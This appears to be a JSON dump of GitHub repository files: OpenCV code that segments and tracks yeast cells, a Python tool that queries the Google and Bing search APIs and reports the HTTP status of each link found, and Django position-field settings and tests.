return(getCellInstImg(self.cellInstanses))\n\n #ret: Image With ID at cell positions\n def getIDImage(self):\n return(self.idImg)\n\n #Setters\n def showFrame(self):\n cv2.imshow(\"optImage\",self.optImage)\n cv2.imshow(\"floImage\",self.floImage)\n cv2.waitKey(0)\n\n #Segmentation of frame.\n #Use the Anlysis Method selected\n def analyseFrame(self):\n self.cellInstanses = OtsuBinarization(self)\n #self.cellInstanses = segementThreshold(self)\n #self.cellInstanses = rfSegmentetion(self)\n #self.cellInstanses = watershed(self)\n #self.cellInstanses = laplacianGausian(self)\n"
},
{
"alpha_fraction": 0.6295205950737,
"alphanum_fraction": 0.6724137663841248,
"avg_line_length": 33.463768005371094,
"blob_id": "b2c277c8d1303bc142a19863930f7b4b4ab8ef6a",
"content_id": "6cc7296638395616dc8bc12713fd893427226317",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2378,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 69,
"path": "/Segmentation/getThreshold.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom Segmentation.FilterDetection import filterDetections\nimport numpy as np\n\n#Threshold Image that\n#Pre: Frame objecet\n#Ret: Threshold Image\ndef getTherholdImage(frame):\n optFrame = frame.getScaledOptChan()\n floFrame = frame.getScaledFloChan()\n\n gaussian = cv2.GaussianBlur(optFrame, (3, 3), 0)\n\n gray = cv2.cvtColor(gaussian,cv2.COLOR_BGR2GRAY)\n gotFrame, thresh = cv2.threshold(gray,50,255,cv2.THRESH_BINARY)\n #Remove background\n thresh = removeLargestConected(thresh)\n #cv2.imshow(\"Thresh\",thresh)\n #cv2.waitKey(0)\n return(thresh)\n\n\ndef removeLargestConected(image):\n conectedCompontents, hirearchy = cv2.findContours(image, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\n drawing = np.zeros((image.shape[0], image.shape[1], 3), np.uint8)\n cellSize = 4500\n sizeThreshold = cellSize*10\n\n for cnt in conectedCompontents:\n #check Size\n\n if(sizeThreshold > cv2.contourArea(cnt)):\n #drawing = cv2.fillPoly(drawing, pts =cnt[0], color=(255,255,255))\n #drawing = cv2.drawContours(drawing, [cnt], 0, (0,255,0), 3)\n drawing = cv2.fillPoly(drawing, pts =[cnt], color=(255,255,255))\n return(drawing)\n\n\ndef convexHull(frame):\n # Finding contours for the thresholded image\n\n contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n #Create an empty black image\n drawing = np.zeros((frame.shape[0], frame.shape[1], 3), np.uint8)\n\n #Draw contours\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n #Draw ith contour\n cv2.drawContours(drawing, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours(drawing, hull, i, color, 1, 8)\n\n for i in range(len(contours)):\n drawing = cv2.fillPoly(drawing, pts =[hull[i]], color=(255,255,255))\n\n return(drawing)\n #cv2.imshow(\"ConvexHull\",drawing)\n #cv2.waitKey(0)\n"
},
{
"alpha_fraction": 0.6728624701499939,
"alphanum_fraction": 0.6914498209953308,
"avg_line_length": 32.625,
"blob_id": "bbdd7bd4cc9b2a9c528def269e568e6be3a08b90",
"content_id": "6b59040e63cbae7ee7c9ed31592d74b229204cdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/Segmentation/Rescaling.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n#Rescale for optimal analysis size\n#What is this size??\ndef rescaleImage(img,portion):\n width = int(img.shape[1] * portion)\n height = int(img.shape[0] * portion)\n dim = (width, height)\n return cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n"
},
{
"alpha_fraction": 0.7091108560562134,
"alphanum_fraction": 0.7178924083709717,
"avg_line_length": 29.366666793823242,
"blob_id": "a03e3522537a0cef4644127133241ed08eeeb240",
"content_id": "ad90d3f33affec380f9eb5895665e1e558e1ba0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 30,
"path": "/Tracking/filterTracking.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Pre: List of trackedCells\n#Ret: Filterd list with trackedCells\ndef filterTrackedCells(trackedCells):\n\n trackedCells = filterByOpserLen(trackedCells)\n trackedCells = filterByMeanSize(trackedCells)\n return(trackedCells)\n\n\ndef filterByOpserLen(trackedCells):\n filterdList = []\n #Filter by observation length\n observationThreshold = 10\n for tracked in trackedCells:\n exsistingLength = len(tracked.getSizesTrace())\n if exsistingLength > observationThreshold:\n filterdList.append(tracked)\n return(filterdList)\n\ndef filterByMeanSize(trackedCells):\n filterdList = []\n #Filter by mean size\n cellSize = 4500\n cellThreshold = 0.2*cellSize\n for tracked in trackedCells:\n meanSizeCell = sum(tracked.getSizesTrace())/len(tracked.getSizesTrace())\n if meanSizeCell > cellThreshold:\n filterdList.append(tracked)\n\n return(filterdList)\n"
},
{
"alpha_fraction": 0.6028012633323669,
"alphanum_fraction": 0.6538054943084717,
"avg_line_length": 32.78571319580078,
"blob_id": "0f503c2d9c60163ba27bf7829abb695e322da4b1",
"content_id": "85f188fb90c90cee6ee011240c93ed721cbd08e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 112,
"path": "/Segmentation/ParmeterizeImagegs.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport cv2\nimport pandas as pd\nfrom scipy import ndimage as nd\nimport gc\n\n\ndef imagesToPrameter(optImgArr,floImgArr,maskImgArr = []):\n #Save Originals to DataFrame\n #img2 = img.reshape(-1)\n #print(\"loading Images\")\n optImgReArr = []\n floImgReArr = []\n for imgIndex in range(len(optImgArr)):\n optImgReArr.append(optImgArr[imgIndex].reshape(-1))\n floImgReArr.append(floImgArr[imgIndex].reshape(-1))\n\n df = pd.DataFrame()\n #df['optImg'] = np.append(optImgReArr)\n df['optImg'] = np.concatenate(optImgReArr, axis=0)\n df['floImg'] = np.concatenate(floImgReArr, axis=0)\n del optImgReArr\n del floImgReArr\n gc.collect()\n\n #Add Filters To Model\n #print(\"loading Median Filter\")\n #MEDIAN with sigma=3\n medC0Z3Arr = []\n medC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n medC0Z3 = nd.median_filter(optImgArr[imgIndex], size=3)\n medC1Z2 = nd.median_filter(floImgArr[imgIndex], size=3)\n medC0Z3Arr.append(medC0Z3.reshape(-1))\n medC1Z2Arr.append(medC1Z2.reshape(-1))\n df['MedS3C0Z3'] = np.concatenate(medC0Z3Arr, axis=0)\n df['MedS3C1Z2'] = np.concatenate(medC1Z2Arr, axis=0)\n del medC0Z3Arr\n del medC1Z2Arr\n gc.collect()\n\n medC0Z3Arr = []\n medC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n medC0Z3 = nd.median_filter(optImgArr[imgIndex], size=1)\n medC1Z2 = nd.median_filter(floImgArr[imgIndex], size=1)\n medC0Z3Arr.append(medC0Z3.reshape(-1))\n medC1Z2Arr.append(medC1Z2.reshape(-1))\n df['MedS1C0Z3'] = np.concatenate(medC0Z3Arr, axis=0)\n df['MedS1C1Z2'] = np.concatenate(medC1Z2Arr, axis=0)\n del medC0Z3Arr\n del medC1Z2Arr\n gc.collect()\n\n #print(\"loading Variance\")\n #VARIANCE with size=3\n varC0Z3Arr = []\n varC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n varC0Z3 = nd.generic_filter(optImgArr[imgIndex], np.var, size=3)\n varC1Z2 = nd.generic_filter(floImgArr[imgIndex], np.var, size=3)\n varC0Z3Arr.append(varC0Z3.reshape(-1))\n varC1Z2Arr.append(varC1Z2.reshape(-1))\n df['varS3C0Z3'] = np.concatenate(varC0Z3Arr, axis=0)\n df['varS3C1Z2'] = np.concatenate(varC1Z2Arr, axis=0)\n del varC0Z3Arr\n del varC1Z2Arr\n gc.collect()\n\n #VARIANCE with size=3\n varC0Z3Arr = []\n varC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n varC0Z3 = nd.generic_filter(optImgArr[imgIndex], np.var, size=1)\n varC1Z2 = nd.generic_filter(floImgArr[imgIndex], np.var, size=1)\n varC0Z3Arr.append(varC0Z3.reshape(-1))\n varC1Z2Arr.append(varC1Z2.reshape(-1))\n df['varS1C0Z3'] = np.concatenate(varC0Z3Arr, axis=0)\n df['varS1C1Z2'] = np.concatenate(varC1Z2Arr, axis=0)\n del varC0Z3Arr\n del varC1Z2Arr\n gc.collect()\n\n #VARIANCE with size=3\n histEC0Z3Arr = []\n histEC1Z2Arr = []\n for imgIndex in range(len(optImgArr)):\n histEC0Z3 = cv2.equalizeHist(optImgArr[imgIndex])\n histEC1Z2 = cv2.equalizeHist(floImgArr[imgIndex])\n histEC0Z3Arr.append(histEC0Z3.reshape(-1))\n histEC1Z2Arr.append(histEC1Z2.reshape(-1))\n df['histES1C0Z3'] = np.concatenate(histEC0Z3Arr, axis=0)\n df['histES1C1Z2'] = np.concatenate(histEC1Z2Arr, axis=0)\n del histEC0Z3Arr\n del histEC1Z2Arr\n gc.collect()\n\n\n if maskImgArr != []:\n print(\"loading Labels\")\n maskImgArrRe = []\n for maskImgIndex in range(len(maskImgArr)):\n maskImg = maskImgArr[maskImgIndex].reshape(-1)\n maskImgArrRe.append(maskImg)\n #print(maskIm)\n df['Labels'] = np.concatenate(maskImgArrRe, axis=0)\n del maskImgArrRe\n gc.collect()\n #print(\"writing to File\")\n #df.to_csv('YeastCell/Train/modelTrain.csv', index=False)\n\n return(df)\n"
},
{
"alpha_fraction": 0.7424242496490479,
"alphanum_fraction": 0.7424242496490479,
"avg_line_length": 15.5,
"blob_id": "9acb316d9a011cd4872c5c00f173acfa094fae32",
"content_id": "50b55e5cf21d4bcbfc72ef6f4fd10ac0b4b7171b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/Segmentation/Denoising.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#TODO\n#Write Method for denoising\ndef denoiseImage(img):\n pass\n"
},
{
"alpha_fraction": 0.6180633306503296,
"alphanum_fraction": 0.6342394948005676,
"avg_line_length": 35.785125732421875,
"blob_id": "c6c27cd0545adb4fe34af8268e4ab0819f729469",
"content_id": "a9b1d9b4d071c12bd2cac1280c853d88338cb579",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4451,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 121,
"path": "/UserInterface/videoClass.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from UserInterface.frameClass import Frame\n#from Segmentation.cellInstance import cellInstance\nimport cv2\nimport numpy as np\nfrom Tracking.centroidTracker import CentroidTracker\nfrom UserInterface.getIDImage import getIDImage\nfrom UserInterface.getClassImage import getClassImage\nfrom Tracking.findLineage import findLineage\nfrom Tracking.filterTracking import filterTrackedCells\n\nclass Video:\n #variables\n frames = []\n tracker = 0\n numFloFrames = 0\n maxDisappeared = 50\n #Constructor\n def vidCapInit(self,optImgCap,floImgCap):\n\n self.numZoom = 1\n self.numVidFrames = int(optImgCap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.numFloFrames = int(optImgCap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.tracker = CentroidTracker()\n\n for i in range(self.numVidFrames):\n print(\"loading Frame \" + str(i))\n #Read Images\n hasFrame,optImg = optImgCap.read()\n hasFrame,floImg = floImgCap.read()\n #Convert Images\n optImg = cv2.cvtColor(optImg, cv2.COLOR_BGR2GRAY)\n floImg = cv2.cvtColor(floImg, cv2.COLOR_BGR2GRAY)\n\n frame = Frame(optImg,floImg,i)\n self.frames.append(frame)\n\n #Init Object With List of mats with frames\n def matListInit(self, mats):\n self.numFrames = len(mats)\n print(\"Loadling \"+str(self.numFrames)+\" Frames\")\n self.tracker = CentroidTracker()\n for frameNum in range(self.numFrames):\n print(\"Loading Frame Number: \" + str(frameNum))\n #frameArr = mats[frameNum]\n #Channels\n optImg = mats[frameNum][0]\n #floImage = floArr[1]\n floImg = mats[frameNum][1]\n frame = Frame(optImg,floImg,frameNum)\n self.frames.append(frame)\n del mats\n\n def threeZoomInit(self, zom0Cap,zom1Cap,zom2Cap,flo1Cap):\n self.numZoom = 3\n self.numVidFrames = int(zom2Cap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.numFloFrames = int(flo1Cap.get(cv2.CAP_PROP_FRAME_COUNT))\n self.tracker = CentroidTracker()\n for i in range(self.numVidFrames):\n print(\"loading Frame \" + str(i))\n #Read Images\n hasFrame,optImg = zom2Cap.read()\n hasFrame,floImg = flo1Cap.read()\n #Convert Images\n optImg = cv2.cvtColor(optImg, cv2.COLOR_BGR2GRAY)\n floImg = cv2.cvtColor(floImg, cv2.COLOR_BGR2GRAY)\n\n frame = Frame(optImg,floImg,i)\n\n #Extra Zoom Levels :))))\n #Read Images\n hasFrame,zom0Img = zom0Cap.read()\n hasFrame,zom1Img = zom1Cap.read()\n #Convert Images\n zom0Img = cv2.cvtColor(zom0Img, cv2.COLOR_BGR2GRAY)\n zom1Img = cv2.cvtColor(zom1Img, cv2.COLOR_BGR2GRAY)\n frame.addZoomLevels(zom0Img,zom1Img)\n self.frames.append(frame)\n\n #TODO take String that tells what init to use\n #Pre: captureVideo, captureFlo\n #Ret: Video object\n def __init__(self,arg1,arg2 = -1,arg3 = -1,arg4 = -1):\n if(arg2 == -1):\n self.matListInit(arg1)\n elif(arg3 != -1):\n self.threeZoomInit(arg1,arg2,arg3,arg4)\n else:\n self.vidCapInit(arg1,arg2)\n self.xSz = self.frames[0].getUserOptImage().shape[0]\n self.ySz = self.frames[0].getUserOptImage().shape[1]\n\n #Methods\n def getNumFrmes(self):\n return(len(self.frames))\n\n #Pre: frameNum nuber of the frame being retrived\n #Ret: Frame of given number\n def getFrame(self,frameNum):\n return(self.frames[frameNum])\n\n def getTrackedCells(self):\n return(self.trackedCells)\n\n def runTracking(self):\n #loop through frames in video\n for frame in self.frames:\n cellInstanses = frame.cellInstanses\n self.trackedCells = self.tracker.updateCellInst(cellInstanses)\n frame.idImg = getIDImage(self.trackedCells,frame)\n frame.classImg = getClassImage(self.trackedCells,frame.xSz,frame.ySz)\n\n #self.trackedCells = filterTrackedCells(self.trackedCells)\n #TODO: Make ID frame and Segmentation Frame Here after filtering\n #for frame in self.frames:\n #frame.idFrame = getIDFrameNY(self.trackedCells,frame)\n #frame.classFrame = getClassFrameNY(self.trackedCells,frame.xScaleSz,frame.yScaleSz)\n\n self.findLineage()\n\n def findLineage(self):\n findLineage(self.trackedCells)\n"
}
] | 48 |
parmaviolet/fossick | https://github.com/parmaviolet/fossick | 48001f286e328acb0ecdbfaf5dd502ce9bc77bf9 | 6f2ec00d02d4a3e8f8342373c1cd349c5e596570 | 801df575cf3e3695c99c294c832591995b7629a4 | refs/heads/main | 2023-01-19T07:48:08.091854 | 2020-12-04T01:18:31 | 2020-12-04T01:18:31 | 308,563,028 | 0 | 0 | null | 2020-10-30T08:01:42 | 2020-11-01T10:32:22 | 2020-11-01T23:45:41 | Python | [
{
"alpha_fraction": 0.6165900826454163,
"alphanum_fraction": 0.6204783916473389,
"avg_line_length": 30.786516189575195,
"blob_id": "af5e2eabf8f72be448b0ff56d4efb9a6e90e8bd8",
"content_id": "94ba6b598f43d6b199257aaa90179e33a0554009",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8487,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 267,
"path": "/fossick.py",
"repo_name": "parmaviolet/fossick",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nFossick v1.0\n\"\"\"\n\nimport argparse\nimport asyncio\nimport csv\nimport logging\nimport os\nimport sys\n\nimport aiofiles\nimport aiohttp\nimport requests\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nPARSER = argparse.ArgumentParser(description='Tool to perform search engine(s) query and return HTTP status of found links')\nPARSER.add_argument('--verbose', '-v', action='store_true', help='increase output verbosity')\n\n# Default arguments\nGROUP_DEFAULT = PARSER.add_argument_group('Default')\nGROUP_DEFAULT.add_argument('--download', '-d', action='store_true', required=False, help='download the link contents locally')\nGROUP_DEFAULT.add_argument('--search-query', '-s', required=True, help='search query to be used')\nGROUP_DEFAULT.add_argument('--write-csv', '-w', required=False, default='fossick-results.csv', help='output results to a CSV file (default filename: %(default)s)')\n\n# Google arguments\nGROUP_GOOGLE = PARSER.add_argument_group('Google Search Engine')\nGROUP_GOOGLE.add_argument('--google-api', '-ga', required=False, help='Google API key')\nGROUP_GOOGLE.add_argument('--google-cse', '-gc', required=False, help='Google CSE ID')\n\n# Bing arguments\nGROUP_BING = PARSER.add_argument_group('Bing Search Engine')\nGROUP_BING.add_argument('--bing-key', '-bk', required=False, help='Bing subscription key')\n\n\nARGS = PARSER.parse_args(args=None if sys.argv[1:] else ['--help'])\n\nif (not ARGS.google_api or not ARGS.google_cse) and not ARGS.bing_key:\n PARSER.error('at least one search engine must be configured')\n\nverbose_print = print if ARGS.verbose else lambda *a, **k: None\nlogging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr)\nlogging.getLogger('googleapicliet.discovery_cache').setLevel(logging.ERROR)\n\n\ndef google_search(search_term, api_key, cse_id, **kwargs):\n \"\"\" Perform Google search using search term\n\n Args:\n search_term ([str]): Google search term string\n api_key ([str]): Google API Key value\n cse_key ([str]): Google CSE Key value\n\n Returns:\n response [str]: JSON search object result\n \"\"\"\n try:\n # https://developers.google.com/custom-search/v1/reference/rest/v1/cse/list\n # Due to API limiting to 10 results returned and a max limit of 100 we loop through till we hit that value\n results = []\n for start in range(1, 100, 10):\n service = build('customsearch', 'v1', developerKey=api_key, cache_discovery=False)\n response = service.cse().list(q=search_term, cx=cse_id, start=start, **kwargs).execute() # pylint: disable=no-member\n\n if response.get('items'):\n results.append({\n 'items': response.get('items')\n })\n else:\n break\n\n verbose_print(f'\\t[d]{results}')\n return results\n except HttpError as e:\n logging.error(f\"[!] Error response from Google Search API - likely incorrect key value(s)\")\n verbose_print(f'\\t[d]{e}')\n return ''\n\n\ndef extract_google_urls(results):\n \"\"\" Extracts URL links from the result JSON\n\n Args:\n results ([str]): JSON search results\n\n Returns:\n results_list ([list]): List of URL links parsed\n \"\"\"\n results_list = []\n\n for result in results:\n items = result.get('items')\n\n for item in items:\n results_list.append(item.get('link'))\n\n return results_list\n\n\ndef bing_search(search_term, sub_key):\n \"\"\" Perform Bing search using search term\n\n Args:\n search_term ([str]): Bing search term string\n sub_key ([str]): Bing subscription key\n\n Returns:\n response [str]: JSON search object results\n \"\"\"\n endpoint = \"https://api.bing.microsoft.com/v7.0/search\"\n params = {\n 'q': search_term,\n 'count': 50\n }\n headers = {'Ocp-Apim-Subscription-Key': sub_key}\n\n try:\n results = []\n response = requests.get(endpoint, headers=headers, params=params)\n results.append({'webPages': response.json().get('webPages')})\n verbose_print(f'\\t[d]{response.text}')\n\n totalMatches = response.json().get('webPages').get('totalEstimatedMatches')\n\n for offset in range(50, totalMatches, 50):\n # more results to query - update params with offset for next pages\n params = {\n 'q': search_term,\n 'count': 50,\n 'offset': offset\n }\n\n response = requests.get(endpoint, headers=headers, params=params)\n results.append({'webPages': response.json().get('webPages')})\n\n return results\n except Exception:\n logging.error(f\"[!] Error response from Bing Search API - likely incorrect key value(s)\")\n return ''\n\n\ndef extract_bing_urls(results):\n \"\"\" Extracts URL links from the result JSON\n\n Args:\n results ([str]): JSON search results\n\n Returns:\n results_list ([list]): List of URL links parsed\n \"\"\"\n results_list = []\n\n for web_page in results:\n links = web_page.get('webPages')\n\n for item in links.get('value'):\n results_list.append(item.get('url'))\n\n return results_list\n\n\nasync def check_url_status(session, search_engine, url):\n \"\"\" Check status of the URL link provided\n\n Args:\n session ([aiohttp.ClientSession]): aiohttp session\n search_engine ([str]): search engine string\n url ([str]): url link string\n\n Returns:\n [type]: [description]\n \"\"\"\n async with session.get(url) as response:\n http_code = response.status\n\n if response.status == 200 and ARGS.download:\n f = await aiofiles.open(os.path.basename(url), mode='wb')\n await f.write(await response.read())\n await f.close()\n\n return {'search_engine': search_engine, 'url': url, 'http_code': http_code}\n\n\nasync def check_all_urls(urls, search_engine):\n \"\"\" Async function for checking status of URL links\n\n Args:\n urls ([str]): list of URLs\n search_engine ([str]): search engine string\n\n Returns:\n [dict]: returns list of dictionaries\n \"\"\"\n async with aiohttp.ClientSession() as session:\n tasks = []\n\n for url in urls:\n tasks.append(\n check_url_status(\n session,\n search_engine,\n url\n )\n )\n\n responses = await asyncio.gather(*tasks, return_exceptions=True)\n return responses\n\n\ndef save_output_csv(filename, search_results):\n try:\n with open(filename, mode='w') as csv_file:\n field_names = ['search_engine', 'url', 'http_code']\n writer = csv.DictWriter(csv_file, fieldnames=field_names)\n writer.writeheader()\n writer.writerows(search_results)\n except OSError as e:\n logging.error(f'[!] Error creating CSV file {filename} - debug info: {e}')\n\n\ndef main():\n \"\"\" \n Main function\n \"\"\"\n logging.info(f\"[i] Fossick v1.0\")\n verbose_print(f\"Command inputs: {ARGS}\")\n\n # Create empty list to store all results\n results = []\n\n # Google Search API\n if ARGS.google_api and ARGS.google_cse:\n google_search_results = google_search(ARGS.search_query, ARGS.google_api, ARGS.google_cse)\n\n if google_search_results:\n google_search_urls = extract_google_urls(google_search_results)\n results.extend(asyncio.run(check_all_urls(google_search_urls, 'Google')))\n\n # Bing Search API\n if ARGS.bing_key:\n bing_search_results = bing_search(ARGS.search_query, ARGS.bing_key)\n if bing_search_results:\n bing_search_urls = extract_bing_urls(bing_search_results)\n results.extend(asyncio.run(check_all_urls(bing_search_urls, 'Bing')))\n\n if results:\n # Print to console\n for item in results:\n search_engine = item.get('search_engine')\n url = item.get('url')\n http_code = item.get('http_code')\n logging.info(f'[i] Found Link: {url} \\n\\tStatus: HTTP {http_code} \\n\\tSearch Engine: {search_engine}')\n\n # Save to CSV file\n if ARGS.write_csv:\n filename = ARGS.write_csv\n save_output_csv(filename, results)\n logging.info(f'[i] Successfully saved output to {filename}')\n else:\n logging.info(\"[i] No results returned\")\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6772673726081848,
"alphanum_fraction": 0.6778563261032104,
"avg_line_length": 29.872726440429688,
"blob_id": "11602e185927303b03bc11b71be68de3679f255f",
"content_id": "93e1ebdbaccfd5f6b11a455ef800bd6f73dfe550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1698,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 55,
"path": "/README.md",
"repo_name": "parmaviolet/fossick",
"src_encoding": "UTF-8",
"text": "# Fossick\n\nFossick is a tool to query search engine APIs.\n\nIt returns link results and the HTTP status codes for each link.\n\n---\n\n## Search Engine Support\n\nThe following search engines are currently supported:\n\n* Bing\n* Google\n\nTo create the relevent key(s) required for the search engine use with the tool, follow the guides below.\n\n* [Bing Search API](https://docs.microsoft.com/en-us/azure/cognitive-services/bing-web-search/quickstarts/python)\n* [Google Search API](https://developers.google.com/webmaster-tools/search-console-api-original/v3/quickstart/quickstart-python)\n\n## Useage\n\nPrint the help with `python fossick.py -h`.\n\n```text\noptional arguments:\n -h, --help show this help message and exit\n --verbose, -v increase output verbosity\n\nDefault:\n --download, -d download the link contents locally\n --search-query SEARCH_QUERY, -s SEARCH_QUERY\n search query to be used\n --write-csv, -w output results to a CSV file (optionally specify filename)\n\nGoogle Search Engine:\n --google-api GOOGLE_API, -ga GOOGLE_API\n Google API key\n --google-cse GOOGLE_CSE, -gc GOOGLE_CSE\n Google CSE ID\n\nBing Search Engine:\n --bing-key BING_KEY, -bk BING_KEY\n Bing subscription key\n```\n\n### Examples\n\nRun query against Bing and Google search engines and write results to CSV file.\n\n`./fossick.py -s 'test query' -ga '<google-api-key>' -gc '<google-cse-id>' -bk '<bing-sub-key>' -w [outputfile.csv]`\n\nRun query against Bing and Google search engines and download files locally.\n\n`./fossick.py -s 'test query' -ga '<google-api-key>' -gc '<google-cse-id>' -bk '<bing-sub-key>' -d`\n"
}
] | 2 |
elec/django-positions | https://github.com/elec/django-positions | 472358e51bdcbfb1ff9531522fd2f44d92aacab5 | 1ee904ccfc82679d630cbab4358c5d6cc763f6df | ca92808bd8ee69d2ecbbebd541ca00c29f7969a3 | refs/heads/master | 2021-07-04T18:53:07.431938 | 2018-12-18T20:00:46 | 2018-12-18T20:00:46 | 162,121,295 | 0 | 0 | NOASSERTION | 2018-12-17T11:36:37 | 2020-07-13T19:32:41 | 2020-07-13T19:31:26 | Python | [
{
"alpha_fraction": 0.7556818127632141,
"alphanum_fraction": 0.7594696879386902,
"avg_line_length": 32,
"blob_id": "85128e6f857932d7e5c5ebcb9fe085cde6d33332",
"content_id": "6d7a3f17a97bebe6ed1fff6d62885d4d43149a46",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 528,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 16,
"path": "/positions/examples/generic/models.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.db import models\n\nfrom positions.fields import PositionField\n\n\nclass GenericThing(models.Model):\n name = models.CharField(max_length=80)\n object_id = models.PositiveIntegerField()\n content_type = models.ForeignKey(ContentType)\n content_object = generic.GenericForeignKey()\n position = PositionField(collection=('object_id', 'content_type'))\n\n def __unicode__(self):\n return self.name\n"
},
{
"alpha_fraction": 0.774193525314331,
"alphanum_fraction": 0.774193525314331,
"avg_line_length": 30,
"blob_id": "f03f313b757b92a2b8f088eba05df4e2bc64430e",
"content_id": "6315748f24abda25612d42dc896f09b14fea32f2",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 1,
"path": "/positions/examples/ci_settings_sqlite.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_sqlite import *\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 32.33333206176758,
"blob_id": "be808a5c2259b179cea629acf346fbe41fd69b57",
"content_id": "9c85978b13d95120915d356ea0dfd1e037f89dec",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 100,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 3,
"path": "/positions/examples/ci_settings_postgres.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "from .settings_postgres import *\n\nDATABASES['default'].update({'USER': 'postgres', 'PASSWORD': ''})\n"
},
{
"alpha_fraction": 0.6656678318977356,
"alphanum_fraction": 0.6780821681022644,
"avg_line_length": 43.92307662963867,
"blob_id": "589260832e46e9fa391cc9d9892ddc638ca19d4d",
"content_id": "05ed9181cf4b857f1e09e297314325d3d0a4f2ee",
"detected_licenses": [
"BSD-2-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2336,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 52,
"path": "/positions/examples/generic/tests.py",
"repo_name": "elec/django-positions",
"src_encoding": "UTF-8",
"text": "import doctest\nimport unittest\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom positions.examples.lists.models import List\nfrom positions.examples.generic.models import GenericThing\n\nfrom django.test import TestCase\n\nclass GenericTestCase(TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n GenericThing.objects.all().delete()\n ContentType.objects.all().delete()\n List.objects.all().delete()\n\n # @unittest.skip(\"Some reason. If you are reading this in a test run someone did not fill this in.\")\n def test_doctests_standin(self):\n # This code just contains the old doctests for this module. They should be most likely split out into their own\n # tests at some point.\n self.l = List.objects.create(name='To Do')\n self.ct = ContentType.objects.get_for_model(self.l)\n self.t1 = GenericThing.objects.create(name=\"First Generic Thing\", object_id=self.l.pk, content_type=self.ct)\n\n self.t2 = GenericThing.objects.create(name=\"Second Generic Thing\", object_id=self.l.pk, content_type=self.ct)\n self.assertEquals(self.t1.position, 0)\n self.assertEquals(self.t2.position, 1)\n self.t1.position = 1\n self.t1.save()\n\n self.assertEquals(self.t1.position, 1)\n self.t2 = GenericThing.objects.get(pk=2)\n self.assertEquals(self.t2.position, 0)\n self.t1.delete()\n\n actual_order = list(GenericThing.objects.filter(object_id=self.l.pk, content_type=self.ct).values_list('name', 'position').order_by('position'))\n expected_order = [(u'Second Generic Thing', 0)]\n self.assertEqual(actual_order, expected_order)\n self.t3 = GenericThing.objects.create(object_id=self.l.pk, content_type=self.ct, name='Mr. None')\n self.t3.save()\n self.assertEquals(self.t3.position, 1)\n self.t4 = GenericThing.objects.create(object_id=self.l.pk, content_type=self.ct, 